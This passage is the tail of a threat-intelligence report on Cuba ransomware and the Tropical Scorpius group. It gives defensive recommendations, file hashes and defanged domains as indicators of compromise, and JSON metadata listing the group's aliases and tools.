related to exploitation techniques.\r\nDeploy an XDR/EDR solution to perform in-memory inspection and detect process injection techniques. Perform\r\nthreat hunting looking for signs of unusual behavior related to security product defense evasion, service accounts\r\nfor lateral movement and domain administrator-related user behavior.\r\nIndicators of Compromise\r\nDriver Dropper:\r\n07905de4b4be02665e280a56678c7de67652aee318487a44055700396d37ecd0\r\naf6561ad848aa1ba53c62a323de230b18cfd30d8795d4af36bf1ce6c28e3fd4e\r\n24e018c8614c70c940c3b5fa8783cb2f67cb13f08112430a4d10013e0a324eaa\r\nZeroLogon Hacktool:\r\nab5a3bbad1c4298bc287d0ac8c27790d68608393822da2365556ba99d52c5dfb\r\n6866e82d0f6f6d8cf5a43d02ad523f377bb0b374d644d2f536ec7ec18fdaf576\r\n3febf726ffb4f4a4186571d05359d2851e52d5612c5818b2b167160d367f722c\r\n3a8b7c1fe9bd9451c0a51e4122605efc98e7e4e13ed117139a13e4749e211ed0\r\n36bc32becf287402bf0e9c918de22d886a74c501a33aa08dcb9be2f222fa6e24\r\n1450f7c85bfec4f5ba97bcec4249ae234158a0bf9a63310e3801a00d30d9abcc\r\nCuba Ransomware:\r\n0a3517d8d382a0a45334009f71e48114d395a22483b01f171f2c3d4a9cfdbfbf\r\n0eff3e8fd31f553c45ab82cc5d88d0105626d0597afa5897e78ee5a7e34f71b3\r\nPrivilege Escalation Tool:\r\na4665231bad14a2ac9f2e20a6385e1477c299d97768048cb3e9df6b45ae54eb8\r\nKerberCache Hacktool:\r\ncfe7b462a8224b2fbf2b246f05973662bdabc2c4e8f4728c9a1b977fac010c15\r\nROMCOM RAT:\r\nB5978cf7d0c275d09bedf09f07667e139ad7fed8f9e47742e08c914c5cf44a53\r\n324ccd4bf70a66cc14b1c3746162b908a688b2b124ad9db029e5bd42197cfe99\r\nInfrastructure:\r\nCombinedResidency[.]org\r\noptasko[.]com\r\nhttps://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/\r\nPage 31 of 32\n\nSource: https://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/\r\nhttps://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/\r\nPage 32 of 32", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia" ], "references": [ "https://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/" ], "report_names": [ "cuba-ransomware-tropical-scorpius" ], "threat_actors": [ { "id": "d4b9608d-af69-43bc-a08a-38167ac6306a", "created_at": "2023-01-06T13:46:39.335061Z", "updated_at": "2026-04-10T02:00:03.291149Z", "deleted_at": null, "main_name": "LAPSUS", "aliases": [ "Lapsus", "LAPSUS$", "DEV-0537", "SLIPPY SPIDER", "Strawberry Tempest", "UNC3661" ], "source_name": "MISPGALAXY:LAPSUS", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "fecc0d5a-3654-425d-9290-b6d0b4105463", "created_at": "2023-10-17T02:00:08.330061Z", "updated_at": "2026-04-10T02:00:03.37711Z", "deleted_at": null, "main_name": "Void Rabisu", "aliases": [ "Tropical Scorpius" ], "source_name": "MISPGALAXY:Void Rabisu", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "555e2cac-931d-4ad4-8eaa-64df6451059d", "created_at": "2023-01-06T13:46:39.48103Z", "updated_at": "2026-04-10T02:00:03.342729Z", "deleted_at": null, "main_name": "RomCom", "aliases": [ "UAT-5647", "Storm-0978" ], "source_name": "MISPGALAXY:RomCom", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d58052ba-978b-4775-985a-26ed8e64f98c", "created_at": "2023-09-07T02:02:48.069895Z", "updated_at": "2026-04-10T02:00:04.946879Z", "deleted_at": null, "main_name": "Tropical Scorpius", "aliases": [ "DEV-0978", "RomCom", "Storm-0671", "Storm-0978", "TA829", "Tropical Scorpius", "UAC-0180", "UNC2596", "Void Rabisu" ], "source_name": "ETDA:Tropical Scorpius", "tools": [ "COLDDRAW", "Cuba", "Industrial Spy", "PEAPOD", "ROMCOM", "ROMCOM RAT", "SingleCamper", "SnipBot" ], "source_id": "ETDA", "reports": null }, { "id": "4f56bb34-098d-43f6-a0e8-99616116c3ea", "created_at": "2024-06-19T02:03:08.048835Z", "updated_at": "2026-04-10T02:00:03.870819Z", "deleted_at": null, "main_name": "GOLD FLAMINGO", "aliases": [ "REF9019 ", "Tropical Scorpius ", "UAC-0132 ", "UAC0132 ", "UNC2596 ", "Void Rabisu " ], "source_name": "Secureworks:GOLD FLAMINGO", "tools": [ "Chanitor", "Cobalt Strike", "Cuba", "Meterpreter", "Mimikatz", "ROMCOM RAT" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434603, "ts_updated_at": 1775791708, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/e6f76326307511f14dd12cd4e709a376bf191b6e.pdf", "text": "https://archive.orkl.eu/e6f76326307511f14dd12cd4e709a376bf191b6e.txt", "img": "https://archive.orkl.eu/e6f76326307511f14dd12cd4e709a376bf191b6e.jpg" } }